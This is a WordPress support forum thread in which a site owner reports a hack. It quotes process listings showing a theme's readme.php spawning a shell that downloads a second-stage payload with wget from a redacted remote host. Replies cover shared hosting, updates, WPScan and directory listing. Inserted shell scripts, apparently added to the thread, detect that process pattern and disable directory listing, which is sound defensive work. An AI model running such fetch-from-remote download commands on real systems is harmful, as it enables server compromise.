• I noticed this:

    ps -ef |grep vivithem
    vivithem 23884 3125 0 Nov23 ? 00:00:00 /usr/bin/php /home/vivithem/public_html/wp-content/themes/montezuma/readme.php
    vivithem 23886 23884 0 Nov23 ? 00:00:00 sh -c cd /tmp ; /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/951/d/sess_35ab70d2284300fcd5c7ca3a3c11b42a 1> /dev/null 2> /dev/null && echo OK
    vivithem 23887 23886 0 Nov23 ? 00:00:00 /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/951/d/sess_35ab70d2284300fcd5c7ca3a3c11b42a
    vivithem 26182 3123 0 Nov23 ? 00:00:00 /usr/bin/php /home/vivithem/public_html/wp-content/themes/montezuma/readme.php
    vivithem 26184 26182 0 Nov23 ? 00:00:00 sh -c cd /tmp ; /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/858/d/sess_03f7ac636967477c5e073a80b62eff4b 1> /dev/null 2> /dev/null && echo OK
    vivithem 26185 26184 0 Nov23 ? 00:00:00 /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/858/d/sess_03f7ac636967477c5e073a80b62eff4b

    That readme.php file was a bin. I killed the processes and reinstalled the theme. Any idea how they could have got in? I changed passwords for FTP, cPanel, etc. I have no SSH access for this account either. I am always on the latest version.
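    The listing above has the shape worth recognising: a PHP interpreter launched on a file inside a theme directory, whose children are `sh -c cd /tmp ; wget ...` pulling a second stage from a remote host. The script below is an added example, not part of the original post or of WordPress, that flags that shape in `ps -ef` output and separately lists `.php` files whose content is a binary rather than source (the poster's observation that readme.php "was a bin"). The sample `ps` lines are constructed from the listing above plus a benign wp-cron line for contrast; the `vivithem` paths, the PIDs and the function names are illustrative assumptions.

```shell
#!/bin/sh
# Added triage helpers, not from the forum thread. Two checks for the pattern in
# the listing above: a PHP process started from a wp-content path that spawns a
# downloader into /tmp, and a ".php" file that is really a binary.

# Constructed sample of `ps -ef` output, modelled on the listing in the post
# (same PIDs and redacted addresses) with a benign wp-cron wget added for contrast.
SAMPLE_PS='UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Nov20 ? 00:00:05 /sbin/init
vivithem 3125 1 0 Nov20 ? 00:00:00 /usr/sbin/httpd
vivithem 23884 3125 0 Nov23 ? 00:00:00 /usr/bin/php /home/vivithem/public_html/wp-content/themes/montezuma/readme.php
vivithem 23886 23884 0 Nov23 ? 00:00:00 sh -c cd /tmp ; /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/951/d/sess_35ab70d2284300fcd5c7ca3a3c11b42a 1> /dev/null 2> /dev/null && echo OK
vivithem 23887 23886 0 Nov23 ? 00:00:00 /usr/bin/wget -t0 -c https://XXX.XXX.XXX.XXX:XXX/951/d/sess_35ab70d2284300fcd5c7ca3a3c11b42a
vivithem 30001 3125 0 Nov23 ? 00:00:00 /usr/bin/php /home/vivithem/public_html/wp-cron.php
vivithem 30002 30001 0 Nov23 ? 00:00:00 sh -c /usr/bin/wget -q -O /dev/null https://wordpress.org/plugins/'

# Reads `ps -ef` output on stdin. Prints "<pid> <ancestor-pid> <ancestor-cmd>" for
# every wget/curl process whose ancestry (up to 5 levels) contains a php
# interpreter running a file under wp-content. The wp-cron wget is not flagged,
# because its parent runs wp-cron.php, not a theme or plugin file.
# Live use: ps -ef | flag_download_children
flag_download_children() {
    awk '
    NR > 1 {
        pid = $2; ppid = $3
        cmd = $8; for (i = 9; i <= NF; i++) cmd = cmd " " $i
        CMD[pid] = cmd; PARENT[pid] = ppid
    }
    END {
        for (p in CMD) {
            if (CMD[p] !~ /(wget|curl)/) continue
            a = PARENT[p]; depth = 0
            while ((a in CMD) && depth < 5) {
                if (CMD[a] ~ /php .*wp-content/) { print p, a, CMD[a]; break }
                a = PARENT[a]; depth++
            }
        }
    }'
}

# Lists *.php files under DIR that start with the ELF magic or contain a NUL
# byte in their first 512 bytes, i.e. files that cannot be PHP source.
# Live use: scan_binary_php /home/vivithem/public_html/wp-content
scan_binary_php() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        magic=$(head -c 4 "$f" | od -An -tx1 | tr -d ' \n')
        raw=$(head -c 512 "$f" | wc -c | tr -d ' ')
        stripped=$(head -c 512 "$f" | tr -d '\000' | wc -c | tr -d ' ')
        if [ "$magic" = "7f454c46" ] || [ "$raw" -ne "$stripped" ]; then
            printf '%s\n' "$f"
        fi
    done
}
```

    The process check keys on ancestry rather than on the command line alone, so a legitimate `wget` spawned by wp-cron.php is left alone while the same binary spawned under a theme's readme.php is reported. The file check is deliberately crude (ELF magic or any NUL byte) so it does not depend on `file` being installed on a shared host; a PHP webshell written as plain text will not trip it, so pair it with a comparison of the theme against a clean copy.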

Viewing 13 replies - 1 through 13 (of 13 total)
  • @vivithemage
    Sorry for your troubles. It always sucks when things like this happen. As for how the exploit was put in place, well….. that is unknown, but there are only a few main ways things like this happen.

    1. Your hosting! Yes, your hosting plays a HUGE role. Does your host use separate spaces for hosting? If not = leave. Basically, one infected site can jump ship and look for other accounts on the server (shared hosting).

    2. Vulnerable out-of-date software. This is mainly plugins, but themes are known to have holes as well. WordPress itself is vulnerable if not updated.

    What is your domain name? I can run an external scan of it and see if there are any plugins that stick out as vulnerable.

    Thread Starter vivithemage

    (@vivithemage)

    They are separate spaces, using cPanel.

    I update my plugins/themes/WP every other week or so when I log in; is that possibly too slow to catch it?

    domain – vivithemage.com

    What scan are you running? I wouldn’t mind knowing it.

    Thread Starter vivithemage

    (@vivithemage)

    Looks like I can’t include links to my domain, but it’s my username . com

    Also, I am on cPanel, so separate spaces are indeed in use.

    I update my WP/Themes/Plugins fairly regularly, maybe once every other week when I happen to log into the admin panel.

    What’s the site you are using to do a scan? Would love to know it.

    Thread Starter vivithemage

    (@vivithemage)

    https://www.vivithemage.com is the domain

    Also, I am on cPanel, so separate spaces are indeed in use.

    I update my WP/Themes/Plugins fairly regularly, maybe once every other week when I happen to log into the admin panel.

    What’s the site you are using to do a scan? Would love to know it.

    You can use WP Scan. Check it out at https://github.com/wpscanteam/wpscan.

    FYI. Although updating is very important, plugins still remain vulnerable if not properly maintained.

    Thread Starter vivithemage

    (@vivithemage)

    Nice, did it come up with anything?

    Sorry. My El Cap update seems to have whacked out my wpscan instance so I am out of the game for the time being.

    Thread Starter vivithemage

    (@vivithemage)

    Dang, was hoping there would be logs of such changes.

    @vivithemage

    I was able to get WP Scan back up and running. I did a scan and you look all up to date, but you do have some server issues.

    You have directory listing enabled, which is never a good thing. Append this to the end of your domain name and you can see what I am talking about.

    /wp-content/plugins/all-in-one-seo-pack/

    Thread Starter vivithemage

    (@vivithemage)

    I enabled that because I had problems with ZEN working. What problems can that cause?

    Directory listing does not cause an issue directly. However, an attacker can see your file structure and thus has a bit more information about your site.
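    The exchange above ends without saying how to confirm the listing from a response or how to turn it off. The script below is an added example, not from this thread or from WordPress, that does both for an Apache-style docroot: it recognises an autoindex page by its title, appends `Options -Indexes` to the site's `.htaccess` once, and drops WordPress's own "Silence is golden" index.php stub into the wp-content subdirectories that commonly lack one. The sample response body is constructed from the path named above; the docroot layout and function names are assumptions.

```shell
#!/bin/sh
# Added example, not from the forum thread: detect an autoindex page and turn
# directory listing off for a WordPress docroot. Paths are assumptions.

# Constructed Apache-style listing body for the path named in the reply above.
LISTING_BODY='<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head><title>Index of /wp-content/plugins/all-in-one-seo-pack</title></head>
<body><h1>Index of /wp-content/plugins/all-in-one-seo-pack</h1>
<ul><li><a href="all_in_one_seo_pack.php">all_in_one_seo_pack.php</a></li></ul>
</body></html>'

# Reads a response body on stdin; exits 0 if it looks like an Apache, nginx or
# lighttpd autoindex page (all of them title the page "Index of /<path>").
# Live use: curl -s "$URL/wp-content/plugins/" | looks_like_autoindex && echo listing
looks_like_autoindex() {
    grep -qi '<title>Index of /'
}

# Appends "Options -Indexes" to DOCROOT/.htaccess exactly once (safe to re-run)
# and creates WordPress's empty index.php stub in wp-content/{plugins,themes,uploads}
# where missing, so a listing is masked even if the host's AllowOverride does not
# permit Options in .htaccess.
disable_directory_listing() {
    docroot=$1
    ht="$docroot/.htaccess"
    touch "$ht"
    grep -q '^Options -Indexes' "$ht" || printf 'Options -Indexes\n' >> "$ht"
    for sub in plugins themes uploads; do
        dir="$docroot/wp-content/$sub"
        [ -d "$dir" ] || continue
        [ -f "$dir/index.php" ] || printf '<?php\n// Silence is golden.\n' > "$dir/index.php"
    done
}
```

    `Options -Indexes` only takes effect if the host's Apache configuration allows `Options` in `.htaccess` (it returns a 500 if `AllowOverride` forbids it), which is why the stub files are written as well; on nginx the equivalent is `autoindex off;` in the server block. Neither closes a hole by itself, as the reply above notes: it removes the free map of which plugin directories exist.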

  • The topic ‘my site was hacked – curious how or what caused it’ is closed to new replies.